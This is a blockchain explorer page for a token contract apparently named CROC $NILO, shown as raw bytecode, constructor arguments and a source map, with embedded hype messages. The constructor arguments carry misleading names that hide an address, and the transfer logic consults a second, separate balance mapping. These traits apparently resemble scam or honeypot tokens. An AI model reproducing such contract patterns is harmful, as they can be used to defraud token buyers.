1610d58602691396001600160a01b0386166000908152600460205260409020549190610b8c565b6001600160a01b0384166000908152600460205260409020555b6001600160a01b038216600090815260046020526040902054610ada9082610c23565b60046000846001600160a01b03166001600160a01b0316815260200190815260200160002081905550600080516020610dab833981519152604051808060200182810382526059815260200180610e986059913960600191505060405180910390a1816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3505050565b60008184841115610c1b5760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610be0578181015183820152602001610bc8565b50505050905090810190601f168015610c0d5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610c7d576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b600081610c9357506000610433565b5090919050565b60006001600160a01b038316610cb1575080610433565b5091905056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737320546869732070726f6a6563742077696c6c206761696e206974732072657075746174696f6e207468726f75676820636f6e74696e756f757320636f6d6d756e69636174696f6e20776974682069747320696e766573746f72732e45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365636f6e74696e756f75732064656c69766572792066726f6d20746865206c656164657273686970207465616d2ecf34ef537ac33ee1ac626ca1587a0a7e8e51561e5514f8cb36afa1c5102b3bab45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a207472616e736665722066726f6d20746865207a65726f206164647265737343524f4320244e494c4f206f666665727320616e20756e6971756520616e64206c696768746865617274656420617070726f61636820746f2074686520776f726c64206f6620626c6f636b636861696e20746563686e6f6c6f67792e45524332303a20617070726f76652066726f6d20746865207a65726f20616464726573735765206172652074616b696e6720616476616e74616765206f6620746865207570636f6d696e672062756c6c72756e20746f206761696e207468652063727970746f20636f6d6d756e697479277320617474656e74696f6e2e45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212204da9f5112e4138e82294d335c8b4f60cb457875063f6751d105fea4ccc86aba364736f6c63430007060033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000a90200dab000044d5011a88012b84581050ce1c9000000000aac79bff232cb7db92620fbf0d8f4cfd219e8c532b945810d4cf5e9

-----Decoded View---------------
Arg [0] : maxVals (uint256): 964864116175126144119401691880916484382455030217
Arg [1] : minVals (uint256): 1124075257018858441330945056951350626011208256960217693756437886441

-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 000000000000000000000000a90200dab000044d5011a88012b84581050ce1c9
Arg [1] : 000000000aac79bff232cb7db92620fbf0d8f4cfd219e8c532b945810d4cf5e9


Deployed Bytecode Sourcemap

8789:10338:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10888:94;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12179:193;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;12179:193:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;11046:102;;;:::i;:::-;;;;;;;;;;;;;;;;12843:444;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;12843:444:0;;;;;;;;;;;;;;;;;:::i;10576:86::-;;;:::i;:::-;;;;;;;;;;;;;;;;;;;13695:281;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;13695:281:0;;;;;;;;:::i;11210:162::-;;;;;;;;;;;;;;;;-1:-1:-1;11210:162:0;-1:-1:-1;;;;;11210:162:0;;:::i;10201:146::-;;;:::i;:::-;;10428:81;;;:::i;:::-;;;;-1:-1:-1;;;;;10428:81:0;;;;;;;;;;;;;;10727:98;;;:::i;14478:381::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;14478:381:0;;;;;;;;:::i;11584:199::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;11584:199:0;;;;;;;;:::i;17178:278::-;;;;;;;;;;;;;;;;-1:-1:-1;17178:278:0;;;;;;;:::i;16304:188::-;;;:::i;16562:608::-;;;;;;;;;;;;;;;;-1:-1:-1;16562:608:0;;;;;;;:::i;11845:188::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;11845:188:0;;;;;;;;;;:::i;10888:94::-;10969:5;10962:12;;;;;;;;-1:-1:-1;;10962:12:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10936:13;;10962:12;;10969:5;;10962:12;;10969:5;10962:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10888:94;:::o;12179:193::-;12283:4;12305:37;12314:10;12326:7;12335:6;12305:8;:37::i;:::-;-1:-1:-1;12360:4:0;12179:193;;;;;:::o;11046:102::-;11128:12;;11046:102;:::o;12843:444::-;12977:4;12994:36;13004:6;13012:9;13023:6;12994:9;:36::i;:::-;13041:216;13064:6;13085:10;13110:136;13164:6;13110:136;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;13110:19:0;;;;;;:11;:19;;;;;;;;13130:10;13110:31;;;;;;;;;:136;:35;:136::i;:::-;13041:8;:216::i;:::-;-1:-1:-1;13275:4:0;12843:444;;;;;:::o;10576:86::-;10653:1;10576:86;:::o;13695:281::-;13840:10;13795:4;13887:23;;;:11;:23;;;;;;;;-1:-1:-1;;;;;13887:32:0;;;;;;;;;;13795:4;;13817:129;;13865:7;;13887:48;;13924:10;13887:36;:48::i;11210:162::-;-1:-1:-1;;;;;11346:18:0;11314:7;11346:18;;;:9;:18;;;;;;;11210:162::o;10201:146::-;9828:6;;-1:-1:-1;;;;;9828:6:0;9814:10;:20;9806:65;;;;;-1:-1:-1;;;9806:65:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10260:6:::1;:19:::0;;-1:-1:-1;;;;;;10260:19:0::1;::::0;;10295:44:::1;::::0;10277:1:::1;::::0;10316:10:::1;::::0;10295:44:::1;::::0;10277:1;;10295:44:::1;10201:146::o:0;10428:81::-;10495:6;;-1:-1:-1;;;;;10495:6:0;10428:81;:::o;10727:98::-;10810:7;10803:14;;;;;;;;-1:-1:-1;;10803:14:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10777:13;;10803:14;;10810:7;;10803:14;;10810:7;10803:14;;;;;;;;;;;;;;;;;;;;;;;;14478:381;14583:4;14605:224;14628:10;14653:7;14675:143;14730:15;14675:143;;;;;;;;;;;;;;;;;14687:10;14675:23;;;;:11;:23;;;;;;;;-1:-1:-1;;;;;14675:32:0;;;;;;;;;;;:143;:36;:143::i;11584:199::-;11691:4;11713:40;11723:10;11735:9;11746:6;11713:9;:40::i;17178:278::-;17257:10;:8;:10::i;:::-;17252:24;;17269:7;;17252:24;17328:6;17286:3;:39;17298:25;17311:7;17320:2;17298:12;:25::i;:::-;-1:-1:-1;;;;;17286:39:0;-1:-1:-1;;;;;17286:39:0;;;;;;;;;;;;:48;;;;-1:-1:-1;;;;;;;;;;;17350:98:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17178:278;;;:::o;16304:188::-;16437:10;16378:8;16421:36;16462:8;16420:64;16304:188;:::o;16562:608::-;-1:-1:-1;;;;;;;;;;;16642:52:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16744:23;;;;;;;;;;;;-1:-1:-1;;;16744:23:0;;;;;;16721:7;;-1:-1:-1;;;;;;;;;;;16744:23:0;;;;;;;;;16793:6;16815:10;:8;:10::i;:::-;16810:24;;16827:7;;;;16810:24;16954:28;16973:1;16977:4;16954:10;:28::i;:::-;16844:9;:106;16903:22;16916:5;16923:1;16903:12;:22::i;:::-;-1:-1:-1;;;;;16844:106:0;;;;;;;;;;;;-1:-1:-1;16844:106:0;:139;17006:4;17025:14;;17021:27;;17041:7;;;;;17021:27;-1:-1:-1;;;;;;;;;;;17063:99:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16562:608;;;;;:::o;11845:188::-;-1:-1:-1;;;;;11997:19:0;;;11965:7;11997:19;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;11845:188::o;18453:374::-;-1:-1:-1;;;;;18582:20:0;;18574:69;;;;-1:-1:-1;;;18574:69:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;18662:21:0;;18654:68;;;;-1:-1:-1;;;18654:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;18733:19:0;;;;;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;:37;;;18786:33;;;;;;;;;;;;;;;;;18453:374;;;:::o;15349:881::-;-1:-1:-1;;;;;15481:20:0;;15473:70;;;;-1:-1:-1;;;15473:70:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15562:23:0;;15554:71;;;;-1:-1:-1;;;15554:71:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15649:11:0;;15663:1;15649:11;;;:3;:11;;;;;;:15;15645:349;;15695:114;15729:6;15695:114;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15695:11:0;;;;;;:3;:11;;;;;;;:114;:15;:114::i;:::-;-1:-1:-1;;;;;15681:11:0;;;;;;:3;:11;;;;;:128;15645:349;;;15862:120;15902:6;15862:120;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15862:17:0;;;;;;:9;:17;;;;;;;:120;:21;:120::i;:::-;-1:-1:-1;;;;;15842:17:0;;;;;;:9;:17;;;;;:140;15645:349;-1:-1:-1;;;;;16027:20:0;;;;;;:9;:20;;;;;;:32;;16052:6;16027:24;:32::i;:::-;16004:9;:20;16014:9;-1:-1:-1;;;;;16004:20:0;-1:-1:-1;;;;;16004:20:0;;;;;;;;;;;;:55;;;;-1:-1:-1;;;;;;;;;;;16075:96:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16204:9;-1:-1:-1;;;;;16187:35:0;16196:6;-1:-1:-1;;;;;16187:35:0;;16215:6;16187:35;;;;;;;;;;;;;;;;;;15349:881;;;:::o;5005:224::-;5125:7;5161:12;5153:6;;;;5145:29;;;;-1:-1:-1;;;5145:29:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;5197:5:0;;;5005:224::o;4120:179::-;4178:7;4210:5;;;4234:6;;;;4226:46;;;;;-1:-1:-1;;;4226:46:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;4290:1;4120:179;-1:-1:-1;;;4120:179:0:o;17803:210::-;17902:7;17931:13;17927:27;;-1:-1:-1;17953:1:0;17946:8;;17927:27;-1:-1:-1;17990:4:0;;17803:210;-1:-1:-1;17803:210:0:o;17528:267::-;17631:7;-1:-1:-1;;;;;17660:24:0;;17656:86;;-1:-1:-1;17708:8:0;17701:29;;17656:86;-1:-1:-1;17769:8:0;17528:267;-1:-1:-1;17528:267:0:o

Swarm Source

ipfs://4da9f5112e4138e82294d335c8b4f60cb457875063f6751d105fea4ccc86aba3
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.